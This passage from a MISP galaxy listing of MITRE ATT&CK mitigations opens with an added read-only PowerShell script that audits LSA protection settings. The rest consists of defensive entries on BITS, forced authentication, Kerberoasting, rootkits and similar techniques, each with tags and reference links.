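The following read-only audit script is an added example, not part of the MISP galaxy or the MITRE ATT&CK content; it reports the LSA hardening state that the Authentication Package Mitigation - T1131 and LSASS Driver Mitigation - T1177 entries describe (RunAsPPL, SafeDllSearchMode, registered LSA packages, Credential Guard). It assumes an elevated PowerShell prompt on the host being checked; the function name and the warning messages are the author's own.

```powershell
# Added audit script (not from the MISP galaxy or MITRE ATT&CK): reports the LSA
# hardening state described in the T1131 and T1177 mitigations. Read-only; run
# from an elevated PowerShell prompt on the host being checked.

function Get-LsaHardeningState {
    [CmdletBinding()]
    param()

    $lsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $sessionKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'

    # RunAsPPL = 1 runs LSA as a Protected Process Light, so only Microsoft-signed
    # authentication packages, SSPs and drivers can load into lsass.exe.
    # Newer Windows 11 builds also accept 2 (enabled without the UEFI lock).
    $runAsPpl = (Get-ItemProperty -Path $lsaKey -Name 'RunAsPPL' `
                 -ErrorAction SilentlyContinue).RunAsPPL

    # SafeDllSearchMode: 1 (or absent, which is the default) searches the current
    # directory late in the DLL search order; 0 disables the protection.
    $safeDll = (Get-ItemProperty -Path $sessionKey -Name 'SafeDllSearchMode' `
                -ErrorAction SilentlyContinue).SafeDllSearchMode

    # Packages LSA loads at boot; compare against a known-good baseline
    # (msv1_0 is the default authentication package).
    $authPkgs = (Get-ItemProperty -Path $lsaKey -Name 'Authentication Packages' `
                 -ErrorAction SilentlyContinue).'Authentication Packages'
    $secPkgs  = (Get-ItemProperty -Path $lsaKey -Name 'Security Packages' `
                 -ErrorAction SilentlyContinue).'Security Packages'

    # Credential Guard (Windows 10 / Server 2016 and later): SecurityServicesRunning
    # contains 1 when Credential Guard is active.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
            -ClassName 'Win32_DeviceGuard' -ErrorAction SilentlyContinue
    $credGuard = ($null -ne $dg) -and (@($dg.SecurityServicesRunning) -contains 1)

    [pscustomobject]@{
        RunAsPPL               = $runAsPpl
        LsaProtectionEnabled   = ($runAsPpl -eq 1 -or $runAsPpl -eq 2)
        SafeDllSearchMode      = $safeDll
        SafeDllSearchEnabled   = ($null -eq $safeDll -or $safeDll -eq 1)
        AuthenticationPackages = @($authPkgs)
        SecurityPackages       = @($secPkgs)
        CredentialGuardRunning = $credGuard
    }
}

# Print the findings and flag anything that deviates from the mitigations above.
$state = Get-LsaHardeningState
$state | Format-List
if (-not $state.LsaProtectionEnabled) { Write-Warning 'RunAsPPL is not set: LSA is not running as PPL.' }
if (-not $state.SafeDllSearchEnabled) { Write-Warning 'SafeDllSearchMode is disabled (0).' }
if (-not $state.CredentialGuardRunning) { Write-Warning 'Credential Guard is not running.' }
```

Any package listed under AuthenticationPackages or SecurityPackages that is not in your baseline for that build is worth an investigation, since that is exactly where a malicious package would register itself.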

The tag is: misp-galaxy:mitre-course-of-action="LSASS Driver Mitigation - T1177"

LSASS Driver Mitigation - T1177 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177" with estimative-language:likelihood-probability="almost-certain"

Table 6665. Table References

Links

https://attack.mitre.org/mitigations/T1177

https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-works

https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage

https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

https://technet.microsoft.com/library/dn408187.aspx

Forced Authentication Mitigation - T1187

Block SMB traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with whitelisting. (Citation: US-CERT SMB Security) (Citation: US-CERT APT Energy Oct 2017)

For internal traffic, monitor for workstation-to-workstation SMB traffic that is unusual compared to the baseline. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.

Use strong passwords so that credential hashes, if they are obtained, are harder to crack.

The tag is: misp-galaxy:mitre-course-of-action="Forced Authentication Mitigation - T1187"

Forced Authentication Mitigation - T1187 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

Table 6666. Table References

Links

https://attack.mitre.org/mitigations/T1187

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices

BITS Jobs Mitigation - T1197

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, disabling all BITS functionality will likely have unintended side effects, such as preventing legitimate software patching and updating. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior. (Citation: Mondok Windows PiggyBack BITS May 2007)

Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.

Consider limiting access to the BITS interface to specific users or groups. (Citation: Symantec BITS May 2007)

Consider reducing the default BITS job lifetime in Group Policy or by editing the <code>JobInactivityTimeout</code> and <code>MaxDownloadTime</code> Registry values in <code>HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS</code>. (Citation: Microsoft BITS)

The tag is: misp-galaxy:mitre-course-of-action="BITS Jobs Mitigation - T1197"

BITS Jobs Mitigation - T1197 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 6667. Table References

Links

https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/

https://attack.mitre.org/mitigations/T1197

https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx

https://www.symantec.com/connect/blogs/malware-update-windows-update

Trusted Relationship Mitigation - T1199

Network segmentation can be used to isolate infrastructure components that do not require broad network access. Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party, or by an adversary if the party is compromised. Vet the security policies and procedures of organizations that are contracted for work that requires privileged access to network resources.

The tag is: misp-galaxy:mitre-course-of-action="Trusted Relationship Mitigation - T1199"

Trusted Relationship Mitigation - T1199 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"

Table 6668. Table References

Links

https://attack.mitre.org/mitigations/T1199

Firmware Corruption Mitigation - T1495

Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification. Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.

The tag is: misp-galaxy:mitre-course-of-action="Firmware Corruption Mitigation - T1495"

Table 6669. Table References

Links

https://attack.mitre.org/mitigations/T1495

Resource Hijacking Mitigation - T1496

Identify potentially malicious software and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Resource Hijacking Mitigation - T1496"

Table 6670. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1496

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Destruction Mitigation - T1488

Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Citation: Ready.gov IT DRP) Ensure backups are stored off system and are protected from common methods adversaries may use to gain access to and destroy the backups to prevent recovery.

Identify potentially malicious software and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Destruction Mitigation - T1488"

Table 6671. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1488

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.ready.gov/business/implementation/IT

Service Stop Mitigation - T1489

Ensure proper process, registry, and file permissions are in place to inhibit adversaries from disabling or interfering with critical services. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Harden systems used to serve critical network, business, and communications functions. Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.

The tag is: misp-galaxy:mitre-course-of-action="Service Stop Mitigation - T1489"

Table 6672. Table References

Links

https://attack.mitre.org/mitigations/T1489

Multi-factor Authentication - M1032

Use two or more pieces of evidence to authenticate to a system, such as a username and password in addition to a token from a physical smart card or token generator.

The tag is: misp-galaxy:mitre-course-of-action="Multi-factor Authentication - M1032"

Table 6673. Table References

Links

https://attack.mitre.org/mitigations/M1032

Rc.common Mitigation - T1163

Limit privileges of user accounts so only authorized users can edit the rc.common file.

The tag is: misp-galaxy:mitre-course-of-action="Rc.common Mitigation - T1163"

Rc.common Mitigation - T1163 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Rc.common - T1163" with estimative-language:likelihood-probability="almost-certain"

Table 6674. Table References

Links

https://attack.mitre.org/mitigations/T1163

SSL/TLS Inspection - M1020

Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.

The tag is: misp-galaxy:mitre-course-of-action="SSL/TLS Inspection - M1020"

Table 6675. Table References

Links

https://attack.mitre.org/mitigations/M1020

Regsvcs/Regasm Mitigation - T1121

Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Regsvcs/Regasm Mitigation - T1121"

Regsvcs/Regasm Mitigation - T1121 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121" with estimative-language:likelihood-probability="almost-certain"

Table 6676. Table References

Links

https://attack.mitre.org/mitigations/T1121

Security Updates - M1001

Install security updates in response to discovered vulnerabilities.

Purchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.

Decommission devices that will no longer receive security updates.

Limit or block access to enterprise resources from devices that have not installed recent security updates.

On Android devices, access can be controlled based on each device’s security patch level. On iOS devices, access can be controlled based on the iOS version.

The tag is: misp-galaxy:mitre-course-of-action="Security Updates - M1001"

Security Updates - M1001 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Device Unlock Code Guessing or Brute Force - T1459" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"

Table 6677. Table References

Links

https://attack.mitre.org/mitigations/M1001

Lock Bootloader - M1003

On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.

The tag is: misp-galaxy:mitre-course-of-action="Lock Bootloader - M1003"

Lock Bootloader - M1003 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1398" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1458" with estimative-language:likelihood-probability="almost-certain"

Table 6678. Table References

Links

https://attack.mitre.org/mitigations/M1003

Network Segmentation - M1030

Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.

The tag is: misp-galaxy:mitre-course-of-action="Network Segmentation - M1030"

Table 6679. Table References

Links

https://attack.mitre.org/mitigations/M1030

Application Vetting - M1005

Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.

Enterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.

Application Vetting is not a complete mitigation. Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.

The tag is: misp-galaxy:mitre-course-of-action="Application Vetting - M1005"

Application Vetting - M1005 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

Table 6680. Table References

Links

https://attack.mitre.org/mitigations/M1005

Exploit Protection - M1050

Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.

The tag is: misp-galaxy:mitre-course-of-action="Exploit Protection - M1050"

Table 6681. Table References

Links

https://attack.mitre.org/mitigations/M1050

User Guidance - M1011

Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.

The tag is: misp-galaxy:mitre-course-of-action="User Guidance - M1011"

User Guidance - M1011 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Attack PC via USB Connection - T1427" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Remotely Track Device Without Authorization - T1468" with estimative-language:likelihood-probability="almost-certain"

Table 6682. Table References

Links

https://attack.mitre.org/mitigations/M1011

Enterprise Policy - M1012

An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.

The tag is: misp-galaxy:mitre-course-of-action="Enterprise Policy - M1012"

Enterprise Policy - M1012 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Abuse of iOS Enterprise App Signing Key - T1445" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453" with estimative-language:likelihood-probability="almost-certain"

Table 6683. Table References

Links

https://attack.mitre.org/mitigations/M1012

Interconnection Filtering - M1014

In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).

The tag is: misp-galaxy:mitre-course-of-action="Interconnection Filtering - M1014"

Interconnection Filtering - M1014 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450" with estimative-language:likelihood-probability="almost-certain"

Table 6684. Table References

Links

https://attack.mitre.org/mitigations/M1014

https://web.archive.org/web/20200330012714/https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

Rootkit Mitigation - T1014

Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Rootkit Mitigation - T1014"

Rootkit Mitigation - T1014 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 6685. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1014

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Update Software - M1051

Perform regular software updates to mitigate exploitation risk.

The tag is: misp-galaxy:mitre-course-of-action="Update Software - M1051"

Table 6686. Table References

Links

https://attack.mitre.org/mitigations/M1051

Vulnerability Scanning - M1016

Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.

The tag is: misp-galaxy:mitre-course-of-action="Vulnerability Scanning - M1016"

Table 6687. Table References

Links

https://attack.mitre.org/mitigations/M1016

Mshta Mitigation - T1170

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Mshta Mitigation - T1170"

Mshta Mitigation - T1170 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Mshta - T1170" with estimative-language:likelihood-probability="almost-certain"

Table 6688. Table References

Links

https://attack.mitre.org/mitigations/T1170

User Training - M1017

Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

The tag is: misp-galaxy:mitre-course-of-action="User Training - M1017"

Table 6689. Table References

Links

https://attack.mitre.org/mitigations/M1017

Screensaver Mitigation - T1180

Block .scr files from being executed from non-standard locations. Set Group Policy to force users to have a dedicated screensaver where local changes should not override the settings to prevent changes. Use Group Policy to disable screensavers if they are unnecessary. (Citation: TechNet Screensaver GP)

The tag is: misp-galaxy:mitre-course-of-action="Screensaver Mitigation - T1180"

Screensaver Mitigation - T1180 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1180" with estimative-language:likelihood-probability="almost-certain"

Table 6690. Table References

Links

https://attack.mitre.org/mitigations/T1180

https://technet.microsoft.com/library/cc938799.aspx

Rundll32 Mitigation - T1085

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting. (Citation: Secure Host Baseline EMET)

The tag is: misp-galaxy:mitre-course-of-action="Rundll32 Mitigation - T1085"

Rundll32 Mitigation - T1085 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085" with estimative-language:likelihood-probability="almost-certain"

Table 6691. Table References

Links

https://attack.mitre.org/mitigations/T1085

https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET

Hypervisor Mitigation - T1062

Prevent adversary access to privileged accounts necessary to install a hypervisor.

The tag is: misp-galaxy:mitre-course-of-action="Hypervisor Mitigation - T1062"

Hypervisor Mitigation - T1062 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hypervisor - T1062" with estimative-language:likelihood-probability="almost-certain"

Table 6692. Table References

Links

https://attack.mitre.org/mitigations/T1062

DCShadow Mitigation - T1207

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of AD design features. For example, mitigating specific AD API calls will likely have unintended side effects, such as preventing DC replication from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.

The tag is: misp-galaxy:mitre-course-of-action="DCShadow Mitigation - T1207"

DCShadow Mitigation - T1207 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207" with estimative-language:likelihood-probability="almost-certain"

Table 6693. Table References

Links

https://attack.mitre.org/mitigations/T1207

Password Policies - M1027

Set and enforce secure password policies for accounts.

The tag is: misp-galaxy:mitre-course-of-action="Password Policies - M1027"

Table 6694. Table References

Links

https://attack.mitre.org/mitigations/M1027

Kerberoasting Mitigation - T1208

Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. (Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible. (Citation: AdSecurity Cracking Kerberos Dec 2015)

The tag is: misp-galaxy:mitre-course-of-action="Kerberoasting Mitigation - T1208"

Kerberoasting Mitigation - T1208 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208" with estimative-language:likelihood-probability="almost-certain"

Table 6695. Table References

Links

https://adsecurity.org/?p=2293

https://attack.mitre.org/mitigations/T1208

Data Backup - M1053

Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.

The tag is: misp-galaxy:mitre-course-of-action="Data Backup - M1053"

Table 6696. Table References

Links

https://attack.mitre.org/mitigations/M1053

Masquerading Mitigation - T1036

When creating security rules, avoid exclusions based on file name or file path. Require signed binaries. Use file system access controls to protect folders such as C:\Windows\System32. Use tools that restrict program execution via whitelisting by attributes other than file name.

Identify potentially malicious software that may look like a legitimate program based on name and location, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Masquerading Mitigation - T1036"

Masquerading Mitigation - T1036 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 6697. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1036

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Execution Prevention - M1038

Block execution of code on a system through application control and/or script blocking.

The tag is: misp-galaxy:mitre-course-of-action="Execution Prevention - M1038"

Table 6698. Table References

Links

https://attack.mitre.org/mitigations/M1038

Software Configuration - M1054

Implement configuration changes to software (other than the operating system) to mitigate security risks associated with how the software operates.

The tag is: misp-galaxy:mitre-course-of-action="Software Configuration - M1054"

Table 6699. Table References

Links

https://attack.mitre.org/mitigations/M1054

Code Signing - M1045

Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

The tag is: misp-galaxy:mitre-course-of-action="Code Signing - M1045"

Table 6700. Table References

Links

https://attack.mitre.org/mitigations/M1045

Boot Integrity - M1046

Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.

The tag is: misp-galaxy:mitre-course-of-action="Boot Integrity - M1046"

Table 6701. Table References

Links

https://attack.mitre.org/mitigations/M1046

Scripting Mitigation - T1064

Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.

Configure Office security settings to enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy. (Citation: Microsoft Block Office Macros) Other types of virtualization and application microsegmentation may also mitigate the impact of compromise. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

The tag is: misp-galaxy:mitre-course-of-action="Scripting Mitigation - T1064"

Scripting Mitigation - T1064 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"

Table 6702. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1064

https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/

Bootkit Mitigation - T1067

Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)

The tag is: misp-galaxy:mitre-course-of-action="Bootkit Mitigation - T1067"

Bootkit Mitigation - T1067 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"

Table 6703. Table References

Links

http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf

https://attack.mitre.org/mitigations/T1067

https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process

PowerShell Mitigation - T1086

It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. (Citation: Netspi PowerShell Execution Policy Bypass) Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.

The tag is: misp-galaxy:mitre-course-of-action="PowerShell Mitigation - T1086"

PowerShell Mitigation - T1086 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 6704. Table References

Links

https://attack.mitre.org/mitigations/T1086

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

Timestomp Mitigation - T1099

Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestomping by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Timestomp Mitigation - T1099"

Timestomp Mitigation - T1099 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Timestomp - T1099" with estimative-language:likelihood-probability="almost-certain"

Table 6705. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1099

https://technet.microsoft.com/en-us/library/ee791851.aspx

Regsvr32 Mitigation - T1117

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET)

The tag is: misp-galaxy:mitre-course-of-action="Regsvr32 Mitigation - T1117"

Regsvr32 Mitigation - T1117 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117" with estimative-language:likelihood-probability="almost-certain"

Table 6706. Table References

Links

https://attack.mitre.org/mitigations/T1117

https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET

InstallUtil Mitigation - T1118

InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="InstallUtil Mitigation - T1118"

InstallUtil Mitigation - T1118 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118" with estimative-language:likelihood-probability="almost-certain"

Table 6707. Table References

Links

https://attack.mitre.org/mitigations/T1118

CMSTP Mitigation - T1191

CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation). Consider using application whitelisting configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries. (Citation: MSitPros CMSTP Aug 2017)

The tag is: misp-galaxy:mitre-course-of-action="CMSTP Mitigation - T1191"

CMSTP Mitigation - T1191 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1191" with estimative-language:likelihood-probability="almost-certain"

Table 6708. Table References

Links

https://attack.mitre.org/mitigations/T1191

https://msitpros.com/?p=3960

Keychain Mitigation - T1142

The password for the user’s login keychain can be changed from the user’s login password. This increases the complexity for an adversary because they need to know an additional password.

The tag is: misp-galaxy:mitre-course-of-action="Keychain Mitigation - T1142"

Keychain Mitigation - T1142 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1142" with estimative-language:likelihood-probability="almost-certain"

Table 6709. Table References

Links

https://attack.mitre.org/mitigations/T1142

Launchctl Mitigation - T1152

Prevent users from installing their own launch agents or launch daemons and instead require them to be pushed out by group policy.

The tag is: misp-galaxy:mitre-course-of-action="Launchctl Mitigation - T1152"

Launchctl Mitigation - T1152 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Launchctl - T1152" with estimative-language:likelihood-probability="almost-certain"

Table 6710. Table References

Links

https://attack.mitre.org/mitigations/T1152

Source Mitigation - T1153

Due to potential legitimate uses of source commands, it may be difficult to mitigate use of this technique.

The tag is: misp-galaxy:mitre-course-of-action="Source Mitigation - T1153"

Source Mitigation - T1153 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Source - T1153" with estimative-language:likelihood-probability="almost-certain"

Table 6711. Table References

Links

https://attack.mitre.org/mitigations/T1153

Trap Mitigation - T1154

Due to potential legitimate uses of trap commands, it may be difficult to mitigate use of this technique.

The tag is: misp-galaxy:mitre-course-of-action="Trap Mitigation - T1154"

Trap Mitigation - T1154 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Trap - T1154" with estimative-language:likelihood-probability="almost-certain"

